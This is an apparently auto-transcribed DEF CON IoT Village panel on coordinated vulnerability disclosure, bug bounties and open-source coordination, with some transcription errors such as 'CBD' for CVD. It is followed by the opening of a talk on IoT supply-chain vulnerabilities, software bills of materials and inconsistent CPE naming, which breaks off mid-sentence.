My main motivation is finding the truth, finding better understanding of how things work. That's awesome. Katie, you've had a lot of experience, monkeying around with CBD. What does the CBD mean to you? Hold on a minute, Lenea. All right. So CBD means to me. So when I think about it, I think of it from a risk-based perspective. And so what we're probing is alluding to here is that my background is government in nature. So I spent about 15 years in the US government, 12 years of that in the US Air Force. And then several other years at Department of Homeland Security, where I ran the vulnerability disclosure profiles programs that most people are familiar with. So like the NIST, NDD program and the Carnegie Mellon CERT CC program and the MITRE CV program. So I was a sponsor for those programs. So in a single year, 2017, we coordinated and disclosed 14,800 vulnerabilities for public disclosure. So it's 14,000 IT vulnerabilities and about 800 ICS vulnerabilities. In the following two years, so 18 and 19, we coordinated and disclosed over 20,000 cybersecurity vulnerabilities. So I've kind of seen things from lots of different perspectives. And when I think about CBD, I think about balancing risk, right? So CBD is really a process. And every time you, when you're going through this process, understand like every organization is going to treat it differently. Because there isn't just standardized like one size fits all kind of here. There's differences that are going to happen across the coordination stack. So if you're looking at digital services, it's going to be different from software, which is going to be different from open source, which is going to be different from hardware or ICS, like all the differences are going to come into play there. But the overarching sort of thing, the big takeaway here is that CBD is balancing risk. It's all about making sure that there is an opportunity for the product vendor to fix the problem before an adversary has the opportunity to take advantage of that. So like it's all about protecting the end user. And I think everybody that I've ever met in the entire ecosystem is all focused on that. Like we may be speaking different languages, we may talk past each other, but I think that everyone is trying to protect the end user. So to me, that's what CBD is about. That's awesome. And remind me to circle back to you later in our talk. Talk a little about some of the psychology behind some of this. Oh yeah, absolutely. I would love to hear my dearest friend Lisa's thoughts on kind of coordinating vulnerability disclosure and kind of what some of your motivations that you've seen or kind of what's behind your motorcycle. Yeah, so I think where I've seen a sort of an evolution of what we do now. I think Heartbleed was sort of the big start of where we paid attention, realized we all needed to come together a little bit, and then Spectre Meltdown sort of brought us even closer. So my thought is that not only do we work with the researchers, but we work across the industry to make sure that we're all doing our best to protect our customers. So like Katie was talking about, it's really our end users that are our focus and making sure that we have the right people involved to be able to solve the issue and then provide a security update so that our customers could get it and be best protected. That I didn't say CBD. Oh, you just did that. I know. Yeah, yeah, yeah. So Omar, kind of you've been doing this for a while and you work for a very large company. So I'm sure you get the opportunity to see a lot of different vulnerabilities. So what what does the whole process meaning? What are some of the motivations you've seen? Yeah, I think that pretty much everybody has summarized very well is protecting the end consumer at the end of the day. But I see it as a very, very complex ecosystem, right that we're trying to actually solve. And Katie, you know, mention in one side hardware, another side software, then if you decompose that then you have open source, which we're going to probably talk about a lot in here. And you have things that, you know, perhaps you cannot even control. I have had a, I guess, a pleasure or not a pleasure in some cases where we're looking at vulnerabilities and even in some cases whenever we try to actually solve the issues, the companies don't even exist anymore. That's another predicament, you know, that in some cases we actually have to take into consideration and it's a fairly complex ecosystem. And at the end of the day, what we have to actually put our heads together is how can we modernize our practice into the way that not only yes, we deal with a single vulnerability, we reproduce it, we actually fix it, we find the patch, but how can we accelerate that process that one everybody's talking that somewhat the correct vocabulary, or at least they can understand each other. And then we also understand the overall risk, right, and how to prioritize things and so on. So it's a fairly complex, we can actually talk about it for quite some time and that's what we're here for. But that's what some of the initial perspective that I want to share. Thank you, I appreciate that. I want to talk about something we touched on in one of our prep calls. We have Anders and Daniel that come at this research angle from slightly different angles. So maybe, and you too, Jelon can figure out who wants to start first, but thinking about the perspective of academia versus a professional bug hunter security researcher, and maybe you can maybe describe some of the particulars in either area, and maybe what are some of the differences you might see between those two different types of research. So from the industry, or rather the bug hunter, the professional or not, there is very often an element of good old fashioned fun. I started out hacking things, not because I wanted to achieve anything with it, just because it was great fun. When you become pro with it, there is different motivations. So if you work for a company and you work on their products, obviously your motivation is to make those products secure. And sometimes my past job, I did some research and that was sponsored by that company, but essentially me doing what I like to do. And their end of it was attention to that company's competences. And my end, of course, was having a bit of fun. So that is probably pretty typical of what hackers get out of hacking. Yeah, from the more academic side, it's more of advancing the field, the knowledge in the field, and there you try to figure out how things work and what the implications there are, what the security implications of certain understandings are. For instance, understanding when you can execute a certain piece of code and that does something that is not intended. What are the implications? And this is interesting from a security perspective than if it enables someone to do something that they shouldn't be allowed to do. Yes, often this involves disclosing a vulnerability to a vendor. But I would say that, for instance, bug bounties that might be very relevant for people from the industry. I think this plays a smaller role in academia because you have to participate in CVD anyway because if you wouldn't, then you would get a lot of problems in the academic community. There's a lot of peer pressure that you participate in this because that's the only ethical approach to handling vulnerabilities. At the same time, if you keep them secret for too long, then there's also the question on why did you keep them secret for so long. Maybe also some perspective that I can share in academia, you see more and more often the fact that academic publications are easier to publish if you have a CVE. I don't think that's a good thing because I think that a CVE does not necessarily describe that a research result really brings you new insights. A CVE is an identifier for a vulnerability, not an identifier that says this is something with a new insight. Also, if you participated in CVD and you mentioned this in the paper, this also gives you bonus points. At least that's my impression to get the paper published. Of course, it's good if you participate in CVD, but my feeling is also that this is going a bit too strong and it's now overemphasized in our community. What about having an icon or a fun name? Of course, I'm really a big fan of logos and names and anything that is fun. But of course, there are multiple layers here. For instance, we had this paper, Hello from the Other Side, which had this name not just by coincidence. It was about a covert channel in the cloud where we send data through the cache from one virtual machine to the other. We really went crazy on that. We built an entire TCP stack on top of that and tunneled an SSH session through the cache cover channel for whatever reason. We then sent a music video through this cache cover channel. Of course, we couldn't just take any music video, so we had to make our own parody of Hello from the Other Side. This is just fun. We are just a bunch of people and we like to have fun. Basically, once you've finished your project, it's really nice to close this up with something nice and funny. Logos on the Other Side also help communicate about the issue. I realized that every time I create slides, my favorite slides are the slides that don't have any words on them, just pictures, logos and icons. Then I can follow the speaker. I don't have to read because I'm very bad at reading. I can't read and listen at the same time. I bet many people can't do that. If there are only icons, symbols and logos, I can follow what the person is saying and look at the images at the same time. I'm always annoyed if I have to speak about the vulnerability and I don't have a logo for it because then I have to put text on a slide. Since Daniel brought it up, let me ask the other panelists, how do you all feel about branded vulnerabilities? Do you like logos? Do you find that helpful to you and your constituents? I'm sorry, Daniel, no. When there's a logo or a PR or everything, it grabs the media's attention so quickly. Sometimes the issue is not that severe or very hard to be able to breach. It gives a little bit of extra fear to our customers. It also encourages us to maybe reprioritize other issues first, which are more severe to our customers. Although I get the point, it's easy to talk about it. They grab the media's attention really quickly. If you put a caveat about the real severity of the issue in there, maybe that would help a little bit. We often have in our team this discussion, should we have a logo, should we have a website or shouldn't we? For most of our papers and most of the vulnerabilities that we discovered, we don't. I think that's also the responsibility of the researcher to assess, is this something that significant that I need this additional PR or is it not? Right. Well, then you're doing it the right way. Maybe, but it's also, I mean, I will have a different view on what is really important than you have. Everyone will have a different view on that. So something that I think is really, really important, you might say, well, it's not really exploitable in our use case. Right. We don't ever want to downplay a researcher's work. I mean, it's important, whatever they do, and we appreciate especially doing CVD with them and not being zero-date. But yeah, it's a more matter of, especially in a bigger industry when you're trying to protect your customers best, how do you approach it? There is a fight for customer attention. And for customers to make the right security decisions, they need to be attentive about the right things. And logos and hype in the press warps that and we have bad security outcomes for our customers due to that. Then of course, there's also the thing that even fixed vulnerabilities sometimes costs a cost of suffering for system administrators running around in basement and patching systems and all the like. And to some extent, I sometimes find over high bucks disrespectful to those people. Yeah, so in my case, I don't have an issue with with logos or anything, even though in a previous call and a couple of exchange Daniel, I alluded into that. Whether it's a logo, as a matter of fact, even for Cisco, we had the first vulnerability with emojis. So we have emojis, logos and everything else. So at the end of the day, if it helps to do an alias for a vulnerability and bring some awareness, I'm perfectly okay with that. The only challenge that I'm seeing or opportunities right is that in some cases whenever we write information and even vendors whenever we, we know we have in my case, we have a research institution at Cisco called Talos and we find vulnerabilities in other people's product right. And yes, yes, yes. So in that case, yes, we also have logos and we put them out there and we put the blog post and so on right. But what we need to do collectively is to make sure that the media is not either downplaying it or over proportion. So we have to have a balance right and we all, you know, say the media, the media, the media, right. So what is our responsibility right there on how we create our security advisories. And it's both ways is, you know, even though we're vendors here and everything, you know, but we have to point fingers to us, you know, how clear is our advisories that we have some collateral that the end consumer actually knows about, you know, what are the implications are and we work with a researcher to make sure that we all understand, you know, what the problem is. And in the previous conversation, we also I also mentioned that the biggest nerd fights in history. It's whenever it comes to CVSS scoring, right. And, you know, whenever it comes to risk and at the end of the day, you know, whether it's CVSS whenever we come up with some new ways and everything we have to have some type of way of saying, yeah, you have to jump right now and fix this vulnerability versus the other 100 criticals that we were also, you know, dependent on and especially with nowadays since it's not so much of a vulnerability coming from like a Cisco or an Intel or Red Hat or anything else is open source right by the time that actually I'm boring you to death in here, probably three more CBEs that are super important has been disclosed. And we don't know about right so so that's the type of balance on the type of, I guess, for a corny way of saying orchestration that needs to take place right in this CBE. I want to add another point here regarding the overhyping and having a logo having a website for something for a vulnerability for research result. It does not necessarily mean that you overhyped it we had experiences where we just put papers on archive without any website without any logo and anything and media picked it up and media reported about it and not necessarily correct in all cases and we have this, for instance, for the, the takeaway paper where we analyzed some site channels on and DCP use and their media picked it up we didn't we intentionally didn't make any website or logo but media picked it up and the reporting. It was not, it was not entirely wrong but it was definitely I would say definitely overhyped. We discussed this also in our team and the conclusion that we had was that in some cases we should have a website, even if it's not a vulnerability that we want to hide because it's not that significant, but just to have a very clear message, which says how relevant is it. I think that's the important part that we also always had on our websites, a short three sentence summary like what is it who has to care about this and what can an attacker do. Yeah, I think that's great. That's great you do that and it's good advice. I think, you know, that I would love to see it be more adopted and in the researcher world. For sure. I think it would help out. Before I move on to my next question, I'm just going to say, when I retire, all of you in vendor world are doomed because I'm going to offer my services to L reg for free writing up crazy headlines. But the touch on a point that Daniel made he invoked the Katie Miseris clause. Let's talk about bug bounties and CVD. Oh, Katie maybe you should take that one. Because our friend Katie and a little trimble here actually has a lot to do with that in her organization. Could you maybe talk about how coordinated disclosure interacts both good and bad with bug bounty. Yeah, so I love Katie Moe. I think that first off let me just say that it is an honor to be confused with Katie Moe. My hair color is like, you know, getting close to hers too now. I don't know. I think I have been accepted to conferences because they thought that I was she. When I showed up, I don't think they were nearly as excited to see me instead of her so but so yeah bug bounties. So bug, tin foil hat really. So I'm trying to be serious here about bug bounties. So what's that is a tool right so they're a tool in a toolkit and they are there to incentivize, but they're a part of a well structured product security portfolio. They're not the whole thing, and there are different motivations that will help people from different perspectives. So in the academic world, for instance, but that is may not weigh as much because a lot of academic institutions don't allow an individual to accept that the heart coal hard cash right. If you are a professional bug hunter, you know that might be how you pay your mortgage and so there's a lot more tied to that. But the problem becomes that like, bug bounties are a wonderful tool and they're, they're great but you have to have a good program in place already to accept that that information to be able to execute on that information and figure out like how do you, how do you actually how there are so many questions about it how do you award how do you manage it like, are we going to tie the payments to see the SS scores are we going to tie the payments to a well thought out proof of concept there's so many pieces that go into it and so I'd say like bug bounty is not a one size it's all it's going to vary from organization to organization and some organizations are going to have different timelines different pieces. It's, yeah it's complex. So, bug bounty is not the end of the world bug bounty is a tool. It's a tool in your toolkit. So it's a great tool. I love the tool because I'm the director of it and tell. But it's not, it's not everything. So vulnerability disclosure is more than bug bounty alone. Yeah, I think when you think about it to like there's a lot of smaller companies that probably, you know, don't have that or don't have the funding, funding for it. But that that doesn't mean that they're not wanting to work with researchers they just can't get the budget to do it. You know, so, so, you know, do your best to try to figure out how to reach out to those companies. Hopefully they have a web page or email address, you know, secure at PISER that security at. I know we struggle a little bit but, you know, there's plenty of us around that could help find the right contacts because we're you sort of come together from all over the place and we're sort of expanding group here I like it. But boundaries are one of the wonderful signs of how the industry has changed back in the 90s. Researchers was often rewarded with that disclosure was rewarded with lawsuits. And now people are the industry are working with the people and have started actually paying the researchers for their efforts. So I very much thumbs up on what boundaries, especially because it shows how the industry has changed on all of you hackers hackers on our days helpers and not the enemy. Yeah, I thought you were going to say t shirts for a minute there in the early days. I like to see it just one to see shirt. Oh, early on the night it was lawsuits, then it became t shirts and then maybe stickers and then. Yeah, and now, and now financial. Awesome stickers. So let's we've touched on it a little bit let's see if we spend some time now we're past the top of the hour here. Let's talk about coordinated vulnerability disclosure inside an open source context. So, I'll go last, but let our esteemed panel here maybe whether it's our researchers are vendor friends kind of describe what your, what works out really well and what was some challenges for you within the open source world, which makes up about 90% of all software now. Jerry open source one. I guess I start. So, so basically, in that stop of mine for me, and it's, you know, it sounds corny whenever people say hey what keeps you up at night and everything else is actually open source right now. It's not so much of the predicament of using open source, we have to use and embrace and contribute to open source and I'm super big fan of that. The challenge when it comes to open source is that it can be anything right like IOT can be anything right so, and it's critical infrastructure for a lot of things. So, to give you some somewhat of a real life you know I guess a realization that we had a while back probably about four or five years ago whenever hardly came, we were looking in the industry right now not only Cisco but a whole bunch of other companies right so what to what to prioritize as far as actually giving funding, probably doing research, and so on so we said, okay so open open SSL and things like that which are actually super important for us. There's a lot of people looking at it right now. So can we look at things that perhaps are actually critical infrastructure that nobody actually has probably taken a look at it right. We're going down the list. And then, and as a matter of fact that number two is perfectly fine because there are two guys that work on open SSL to get paid to do it. Yes, indeed, indeed. And the example that I was going to go is NTP, the network time protocol so NTP is specifically. And there's also two guys that don't get paid, which is bad right is there, not even the full time job right. Well, I guess it's now your fast forward this year is a little bit better now right so it's a lot better. And it's not that the problem is that poor guys that actually are contributing to the code is a matter of scalability is a matter of actually even, you know, running static analysis into the thing didn't even assist, you know, five years ago for these components. Now of course we're modernizing our ways you know even if you submit things of GitHub a lot of things actually happening and we're we're getting we're getting better for sure. It's just that it's getting way more complicated right and more people actually are in not only of course contributed but using it more than contributed, which is the other predicament. And in some cases, we were talking about bug bounties. In some cases actually amazing. I'm a big fan of bug bounties right the challenge is that in some cases, we also don't think about does this affect other vendors, and my actually finding some type of vulnerabilities that you know perhaps yes it's a single injection cross ice scripting which is actually pretty pretty common but I'm doing some fuzzing and I, you know, crash an application. What is the underlying issue right and in some cases actually kind of a commodity you know goes back and forth, and it hasn't been shared. And then two or three months down the road you say oh, but this CBE was not shared with other these vendors that they're also affected. So we go back and, and in some cases you actually see people trying to find the same or found the same CVs and they reported a different way but you know, there were no coordination so those are the things that are that are crucial right for us to be successful and not only among vendors but actually downstream and upstream as well right so especially when it comes to IOT is like number one. Yeah so Omar you brought up a few points you know one is who do you bring in right ahead of time and I think that we're seeing that even if you're the competition we still want to work together in the background here. You know, we, our whole goal is to protect our customers, and we often have the same customers even if we're competitors. So we like to, you know, make sure that we're all working together and ideas is when do you bring someone in and it's not only the researchers. Okay, CROPE, where you got your hand raised go ahead. Can I tell you it's a secret. Yes. Open source has worked with our competitors for 25 plus years. Yeah, yeah, well, I would have to say, we, you know, with with some of those other vendors in the industry, it wasn't always so nice. They were playing with the close source. We're getting better. But I think what you know what would not only the researchers should be thinking who else is affected but when we are the receiving and we should be thinking who else is affected and bring them in. I recently worked on an issue of a very recent one where the we are in Key Base and the researchers were in right with the industry people who were fixing the issue. And there was great, you know, coordination between the pink, you know, amongst the group there. It was pretty awesome to see of how, how much we've evolved. How do you do that though with like open source though when everything's shown. It's super easy. Well, and I'll, I guess I'll chime in before we let other folks. I found it, I found it very interesting how some vulnerabilities have been patched wide in the open under the cover of some other patch. I don't know what yeah, I don't know what you're talking about at all. So, in general, open source, there is no single definition of what open source is you could have two young ladies in Bangladesh that have an amazing idea and they're just trying to get this creativity out there to share with the world. You could have large corporations like a lot of the folks represented here. I mean you can have academics. So open source is a lot of different things and there's really no one definition or moniker that fits that works with every community. But if you're thinking about the types of open source that might make up a product or some kind of a cloud offering, you're going to have the high end of the spectrum or things like the kernel group, which is very mature and organized and then you get you start moving down to like a patchy foundation, these other large, large communities and then you get down to something where it's a single person, a couple people that are just playing around. And it's hard to put any kind of structure or process to all these different models because a lot of people that code for open source are doing it for free for no renumeration from large companies that make a lot of money off of it. But they do it for free because they love kind of adding value and expressing their creativity. And as Daniel mentioned, open source is very creative and some of the larger projects we do have ways to privately take in data. So we take in a private bug report that's well established within the community for a long time. And when you're looking at a less mature community or package or library, they might not have that capability. And that's where larger kind of big brothers and big sisters like a Red Hat or a Susie are canonical kind of step in and try to help mentor these smaller projects to help them get these good practices set up so they can take in a private note. Because sometimes a lot of my team we track between 3,000 and 5,000 vulnerabilities a year out of 450,000 packages. That's a lot. Not all of them really kind of bubble up to the level of they need the attention of like a Spectre meltdown or a Heartbleed or a Blueborn, all these kind of the other big name nonsense things. But they still need to get fixed and what open source is really good at is you identify a problem. The team attacks it collaboratively. They develop a solution and release that update very quickly. And they don't like to spend a lot of time making a big deal out of it because they've already moved on to the next feature, the next big thing. But yeah, it can be challenging, but there are definitely ways to do it. There are methods to do it. There are groups that allow this. I hear a lot of bleep into the background. What's going on, folks? I'm wondering when you're going to change your hat again. Sorry. There we go. Bring out Big Red. All right, let me get this panel back under order. When you're thinking about doing a CVD, what are some things you might want to prepare for? What can you do to help make that coordination very successful? And let me start off with, we'll start off with Lisa because she has a lot of ideas. So from your perspective, what will make you successful when you're getting ready to do this multi-party coordination? So I guess it depends on how familiar you are with it or not. If I was a researcher and I wasn't too familiar, I would potentially utilize cert or something like that if I felt like it was going to cross over more than one company in the industry. Just to have them help. Because I think it could be overbearing of figuring out how if one, you know, if industry, you know, company A wants this date to get it fixed and company B wants another date and company C wants another date. So I think that's one way that people, a researcher could use. But I think the idea is to figure out when you start is what are your rules? What's your embargo date? How many days do you actually want to, you know, give the company or vendor to fix the issue? Basically, it's 90 days. I would prefer that as a company. I think it's respectful to do that, especially when things get more difficult. So think about your rules and what you want to do and how you want to approach it. But I'll pause there because I know we're running out of time to get other people in. Anders, what are your thoughts about how you could make CVD successful? Three things. Use it. It's a tool not only for vendors but also for hackers. Listen to what vendors are saying or what hackers are saying and try to make the best out of it and be aware that there's often a lot of complexities involved with it. Be patient, right? Yeah. Omar, what are your thoughts on how you can make CVD successful? Yeah, I think that I'm going to capitalize on something that Daniel mentioned in a previous call. And in some cases, even if you provide some data to even a vendor or whoever, right, to whenever you're coordinating, you have to make it first easy to understand. But at the same time, in some cases, getting the right people at the right place at the right time to make sure that you understand the technical implications of a given vulnerability and sort of running around because even if you have the 90 days or 60 days or 100 days, getting that streamline and modernizing the way that we actually exchange the information among all the affected parties, that is number one. And Art Manion, which is actually a good friend of mine, he leads the team. We all love art. He's the first one that will tell you we cannot scale. This is a big ecosystem. Having a roll of decks of older vendors that actually use a component is foolish, right? We will never ever be able to actually have a complete thing. But what we have to think about is what Lisa mentioned is that in some cases, we are working with competitors, right? Even more than our companies. For example, you know, I work with Lisa a lot. I work with Juniper even more in some cases more than I work with Cisco whenever it comes to fixing a vulnerability, let's say in BGP, OSPF or whatever the case might be. So that type of thing of, oh, I'm not going to talk to these competitors. They're probably my everything else. It's not, you know, that's 20 years ago, fallacy. And then the last one is that at the end of the day, I have the reality and I tell my guys at Cisco is that whenever I push about the night I publish a CV out there. The number ones that actually are reading that CV are the bad guys, right? And probably at the same time that you're committing an open source code, you know, probably that's going to be the case too. So what we have to do is think about how can we change information to the consumer to downstream and upstream providers in a more modern way. And another sounds corny, but you know, can we actually make it more and we're trying to do that machine readable? Right? So if in the case that we actually have that role of the X of people and everything else, you know, get some tool. And that's what art and you know, the guys in insert that also do and you know, we're creating tools that allows us to do that. And even if you have, I don't know, even two years ago that didn't assist and it wasn't even a thought. So we have to move faster. That's the one thing that I want to say. So as I close, I'll say art manion has the best facial hair in the industry. I love art. I want to thank our panel here. This was a great hour together. I really appreciate your time and expertise. We're going to be hanging out for a little bit on this awesome discord channel that my kids made fun of me all week about because I've had it up. Thank you everybody for coming and your attention here panelists. And thank you to the audience for DEF CON for having us here at the IOT village. Enjoy your day and enjoy the rest of the column. Got some great stuff lined up the rest of the weekend. CBD all the way. Oh yeah. We're out.
Under the best of circumstances, coordinating disclosure of vulnerabilities can be a challenge. At times it can feel like everyone involved in CVD has conflicting motivations. The truth is that all of us are aspiring to do the right thing for end-users based on our perspective. The panel will share experiences and show how researchers and technology companies can work together to improve the impact of disclosing vulnerabilities on the technology ecosystem. Join CRob (Red Hat), Lisa Bradley (Dell), Katie Noble (Intel), Omar Santos (Cisco), Anders Fogh (Intel) and Daniel Gruss (TU Graz) for an exciting and engaging dialog between security researchers and industry experts on the Joy of coordinating vulnerability disclosure.
10.5446/50733 (DOI)
All right. All right, all right, all right. What's up, y'all? All right, welcome to my talk IOT under the microscope here virtually. It's kind of disappointing. I'm looking at a screen here instead of all you in the audience, but hopefully we'll get through this and we'll have a good time doing it. I want to talk about vulnerability trends in the supply chain. I've got some very interesting things I think that we found in our data set size. So hopefully you guys will learn something here and we'll have a little fun while doing it. All right. Okay. So who am I? I'm Parker Wixel. I'm born and raised here in Columbus, Ohio. I've got 25 years industry experience on cybersecurity, on software development, full stack development, last 10 years of which have really been focused on cybersecurity research and product development. I was a contributor and developer of open source security projects like AFL Unicorn. It's a fuzzing framework for emulated binaries and then Patchwork, which is a statics compilation of Linux kernels or patching of Linux kernels for debugging purposes. Like it was mentioned, I'm a senior engineer at Finite State. We're an IoT cybersecurity firm dealing with a lot of the topics that we're talking about here and all my data sets and stuff like that come from our Finite State repos and some of the products that we're working on here. I'm also a database lecturer over at the Ohio State University looking to kick off yet another fall there and then I'm a composer and a musician. Don't hold that against me. I realize early on that there's not a lot of money in music. Here I am on just another passion of mine, computers. Why is this talk relevant to your interests? We're going to be talking about supply chain trends, vulnerable and not vulnerable, vulnerability standards and reporting, and then some firmware statistics and observations. Probably about the first half of the talk is going to be delving into the background of what supply chains are, some of the ways that we have to talk about vulnerabilities, what the supply chain introduces as far as vulnerabilities and visibility into those. Then probably the last half will be delving into the fund numbers, probably why you came to see this talk. Nevertheless, hopefully we learned something in both parts. Our dataset that I'm pulling from right now, we do have partnerships with some private industry partners. We do not include all of our private repos and stuff like that, but for this particular talk I've got about 7 million files, represents about 50,000 firmware images, 10,000 distinct product lines, and 150 different vendors. This is different architectures, different operating systems. A lot of them are Linux based, some of them are RTOS, obviously. We're hitting all the different verticals that usually hear about in these talks, medical devices, critical infrastructure, security devices, home routers, Alexa, whatever. We've got a bunch of different types of products in our dataset. Hopefully the statistics that we talk about here on the second half, keep this in mind, it's fun to be able to troll a dataset of this size. Let's take a step back. Let's talk about the supply chain. Let's talk about the problems that are introduced as a part of the supply chain and what the problems are, maybe even go into some of the solutions. If you are a manufacturer XYZ of a security camera, that security camera is running some sort of firmware on it. There's hardware and there's firmware. The firmware is actually software that's written for that hardware device. We like to think of it as firmware because it's kind of baked in. It's usually not as fluid or as dynamic. The software tends to be in, say, a PC or whatever. The camera still has a full processor memory architecture. It's a full computer running in that thing. If you can take advantage of that or take over that product from a vulnerability standpoint, you've accessed a whole computer's worth of resources. You have hardware components that go in the thing. You have drivers that talk to those hardware, operating systems, libraries, apps, you name it. They're all just the same except they're called firmware. The problem is on a security camera like this or any kind of IoT device is you're going to have multiple vendors. If you're a company XYZ, you're making this product, those hardware components may come from various different vendors and then there may be other vendors like vendor A who talks to your underlying camera optics and can put some image recognition on top of it or whatever else like that. Vendor B may be some support libraries or whatever. The real problem comes in is not only do you have to track vendor A, vendor V, vendor C and what all they're putting onto your device, which quite frankly is not always the case. There's not always full disclosure there, but then vendor A and vendor B may rely on an open source library somewhere, vendor X, that you don't even know about. They may or may not even know that they're using it depending on if their developers have reported on it. The thing that makes that even worse is that vendor X library, say it's the same low-level image processing library. It may be version 1.1 in vendor A and vendor B in their libraries that they're including on your device has 1.5. Maybe vendor A's 1.1 version of vendor X has a vulnerability in it and the 1.5 version doesn't. How do you know what all component libraries you have in the simple camera? This is a full computer running on your network, right? So Donald Rumsfeld, when he was Secretary of Defense, brought this notion together that information can be divided into three categories he said at the time, known, known, unknown, unknown, unknowns. We take that kind of approach towards IoT vulnerabilities. Our known, knowns are vulnerabilities that have explicitly been discovered through scanning and testing on our devices. We've tested it, we know that there's a vulnerability, we patch it or whatever like that. So that's our known knowns. Our known unknowns are newly created software versions or even just upgraded versions or whatever that we've pulled in libraries or whatever that we don't have any kind of application testing behind yet. So who knows what is going on under the hood there? So we know the device, we just don't know if there's any vulnerabilities there. And then in the last categorization of the three, unknown, unknowns are vulnerabilities that are in your camera or your device that you don't know and that nobody else knows. And these are what we're calling zero days, all right? So these zero days or not zero days because we haven't even discovered them like say Ripple 20. Ripple 20 was just discovered a month or two ago. Before then, it was an unknown unknown. It was in all these different devices, but nobody knew it was there. But the weakness was still there waiting to be discovered. So there's an awful lot of work to be done in discovering zero days. As a security researcher, we know that trying to protect yourself and to get through all that is really a challenge trying to find out what is vulnerable or not. So for this talk, we're going to talk about known or unknown knowns. This is a fourth dimension that we like to talk about. And it's comprising that which we intentionally refuse to acknowledge that we know or we don't like to know, okay? So that their vulnerabilities that are known to exist that have not been associated with all the systems that are actually affected. So we know all these CVs are against this open SSL library, but we don't know if that SSL library is in our device. So we're just going to kind of ignore it for now. So this unknown knowns is where we can do an awful lot on our part as manufacturers or security researchers to ferret out and to discover and to patch before other actors out there find the same vulnerabilities and test them against your same device. So all of that can be done through a software bill of materials. So a software bill of materials or an SBOM is there's a bill of materials that usually comes in the manufacturing world that they're very used to of all the components that make up certain devices. So if you're getting big printing presses or whatever else like that, you know all the pieces that make up that printing press so you can plan maintenance, you know, all, you know what the cost is going to be up front. So as a industry software industry, IOT industry, we should have the same thing, the software bill of materials, but we don't. All right. So manufacturers don't know all their components, all the different chips, system on chips that are running inside their devices, all kinds of vendors don't know all their suppliers and their suppliers suppliers because a lot of times vendors will make a product, but then they'll ship it off to a manufacturer to actually make for them. And so how do you validate that, you know, that things are exactly as you designed them or whatever. And then consumers, those of us who put these devices in our critical infrastructure into our security systems into our monitoring software or monitoring networks, even in our homes, we put these devices into our networks, but we don't know all the software that's running on those devices. So the analogy is like, if you found a laptop out in the parking lot of your company or whatever, would you bring that laptop in, fire it up, boot it up and plug it into your critical infrastructure security system network, just to poke around on the laptop and see what's running on it. And I would hope that most of you or all of you would say no, there's not a chance that you would ever do that because we know that those are full computer systems with operating systems that can be compromised with viruses, malicious software, et cetera. But yet with that exact same mentality, we don't apply to IoT devices. We'll take a camera that we do not know all the supply, all the software that's running on it and all the weaknesses that might be inherent on the software. And we'll take that camera and we'll plug that same camera into and talk to it on our critical infrastructure network. So we don't have any way to enumerate this. So how do we generate one of these software build materials reliably? How do we keep track of all those? Say it was even possible to keep track of all the components that are in there, how do we validate one of our devices against one? So we as manufacturers may even develop a device and we might know exactly what we want on it, but if we send it away and it comes back, who's to say that whoever made that device for us put our firmware on there exactly as it was intended and they didn't slip something else in? The other thing would be, and this has happened, is if you as a consumer have a device and you want to update it to the latest update patch, say there's a security vulnerability and you want to patch it, you go to the manufacturer or the vendor's site and you download the update for that firmware and you flash your device with that firmware, how do you know that software wasn't compromised? We have seen in the industry places where upload servers have been compromised by malicious actors and custom firmware has been placed in there as updates and customers have downloaded malicious updates to their devices, which might have been perfectly fine in the first place, but now we're running malicious software. So not only generating a software bill of materials, but validating against the bill of materials is critical and being able to do that. So let's shift away. One thing I'd like to mention about company commitment and stuff like that is I just read Microsoft has a product Azure sphere that they're developing that's a secure IoT chip and it's one way of approaching it, hey, let's control the ecosystem from the beginning and secure it down and they've made commitments to the software bill of materials. So it would be nice if more companies could be able to control their environment such as Microsoft has the luxury to do. And I think these kind of commitments are going to be our way forward is following practices like this generating our own software bill of materials, taking a hard look at what's running on that. So let's switch to today. We have these devices. We don't know what's running on them. Let's look at the CVE CPE reporting mechanisms that we have for finding vulnerabilities in our software. So CVE is common vulnerability exposures. It's a system that provides reference methods for publicly known information security vulnerabilities and exposures. So it's been around a while, MITRE is the one who came up with that and helped maintain that. So these are all the vulnerabilities that are discovered and reported for public knowledge. So it's great we have a central place to report vulnerabilities. As well we have a national vulnerability database with the US government that keeps track of CPEs or common platform enumeration. So this is a structure naming schemes for naming products. This is system, software, software packages, et cetera. So there's a common way to put all this together. The only problem is that we have these frameworks for enumerating these kinds of vulnerabilities or these products, but there's not a lot of adherence or sorry, hard regulations around how we use this. It's a very flexible system and it works fairly well when treated well. But there's a lot of inconsistency across the whole space about how we use CPEs, how we report them, how we link them to products that they apply to, et cetera. So let's look at some of these. Our CPEs, just complete products is at your whole camera system is that whole device, one product, a CPE. Are the component systems in there, your optics and stuff like that? Are the system on chips that are running on there? Is that a CPE? Should that be have its own product entry into that database? Are there libraries within? You're using OpenSSL. That's great. But what about libcrypto that lives within it? Could that be separate from OpenSSL? Could that be its own product? So there's an awful lot of questions that we need to answer with all that. So if we look at something like OpenSSL, it's a commercial-grade product. It's a commercial-grade, secure sockets layer. It also has cryptographic libraries in it. If you go to the NVD, the database, and look up OpenSSL, because you want to find out what product it relates to, because maybe you found a vulnerability, OpenSSL brings back 405 results. Now, every single version of that software is going to be another result. So 405 is not necessarily all the different types of OpenSSL. But there are several. So here's a few examples that come back with OpenSSL. So the very top one is usually what we think of as OpenSSL. It's a CC++ library that is compiled into a lot of Linux systems and stuff with OpenSSL included. 0.9.7 was particularly vulnerable. There's a lot of different CVEs on there. 0.9.8, 1.0, 0.1, et cetera. So there's a lot of different versions of that. The Starfields, we'll just kind of gloss over for now, but those are further ways that you can enumerate or specify what specific product this is if there's a lot of different versions, betas, alphas, different platforms, et cetera. But what are all these other CVEs or CPEs that we see out there? We see this Calderon Pi OpenSSL. So the first part is our vendor. The second part is the actual product. So we have this Pi OpenSSL. I guess we can make a guess that that would be a Python binding for OpenSSL or a Python library. Then we have Lua OpenSSL on the next line. So we guess maybe that's Lua script. But then look at the next two. We have Node OpenSSL. And if you go all the way down to the node.js, that's the target software that it's targeting, not the language, but the target software, which is it's written for Node.js, right? So it's a JavaScript module written for Node. But the very next line, OpenSSL.js project, OpenSSL.js. So you have Node OpenSSL, and then you have OpenSSL.js, and you have Node.js at the end. So now you have someone who's writing for Node that has their own way of specifying, but you have two different competing libraries, which one is which. And then you go down to the last one, OpenSSL project, OpenSSL. Now that looks an awful lot like the first one, OpenSSL. So which one is that? Well, the hard part is, is we really don't know. And if you dig into the metadata about this, and you actually go to the web page, the title doesn't help you very much, OpenSSL project, OpenSSL. So we go into the references, 